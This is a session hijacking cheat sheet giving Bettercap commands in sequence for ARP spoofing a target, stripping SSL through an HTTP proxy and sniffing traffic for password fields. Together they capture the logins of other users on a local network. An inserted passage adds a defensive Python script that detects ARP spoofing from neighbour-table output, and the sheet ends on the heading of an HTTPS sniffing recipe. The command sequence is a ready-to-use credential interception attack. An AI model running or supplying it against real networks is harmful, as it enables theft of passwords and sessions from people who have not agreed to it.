Session hijacking cheat sheet

Bettercap

Using Bettercap to collect all HTTP logins used by routers, servers, and websites that do not have SSL enabled

bettercap -iface eth0
-iface: Specifies the interface to bind to.

net.probe on
This module will send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.

net.recon on
The net.recon module displays the active IP addresses detected on the network. This module will start sniffing network packets in real time.

set http.proxy.sslstrip true
This parameter enables SSL stripping in the http.proxy module.

set arp.spoof.internal true
This parameter makes arp.spoof spoof the local connections among computers of the internal network.

set arp.spoof.targets [Target IP]
This parameter sets the IP address of the target host to spoof.

http.proxy on
This command starts the HTTP proxy.

arp.spoof on
This command starts ARP spoofing.

net.sniff on
This module is responsible for performing sniffing on the network.

set net.sniff.regexp '.*password=.+'
With this parameter set, net.sniff will only consider packets whose payload matches the given regular expression (in this case, '.*password=.+').
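
From the defender's side, the arp.spoof step above leaves a visible trace on hosts in the subnet: the gateway's IP and another host's IP resolve to the same MAC address in the neighbour table. The following is an added example (not part of the original cheat sheet) that checks `ip neigh show` output for that condition; the sample table, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output from a monitored host (not real data).
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 02:00:00:aa:bb:01 REACHABLE
192.168.1.20 dev eth0 lladdr 02:00:00:aa:bb:01 STALE
192.168.1.30 dev eth0 lladdr 02:00:00:cc:dd:30 REACHABLE
192.168.1.40 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-fA-F:]{17})\b"
)


def parse_neigh(text):
    """Return {mac: sorted list of IPs} for entries that carry a link-layer address."""
    by_mac = defaultdict(set)
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            by_mac[m.group("mac").lower()].add(m.group("ip"))
    return {mac: sorted(ips) for mac, ips in by_mac.items()}


def find_arp_conflicts(text, gateway_ip=None):
    """Flag MACs claimed by several IPs; 'high' when the gateway is among them."""
    findings = []
    for mac, ips in sorted(parse_neigh(text).items()):
        if len(ips) > 1:
            severity = "high" if gateway_ip in ips else "review"
            findings.append({"mac": mac, "ips": ips, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_arp_conflicts(SAMPLE_NEIGH, gateway_ip="192.168.1.1"):
        print(f"[{f['severity']}] {f['mac']} answers for {', '.join(f['ips'])}")
```

A shared MAC can also be legitimate (proxy ARP, virtual IPs on one interface), so findings marked "review" need confirmation against the known inventory before being treated as spoofing.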

Using Bettercap to sniff network traffic from HTTPS-based websites

set http.proxy.sslstrip true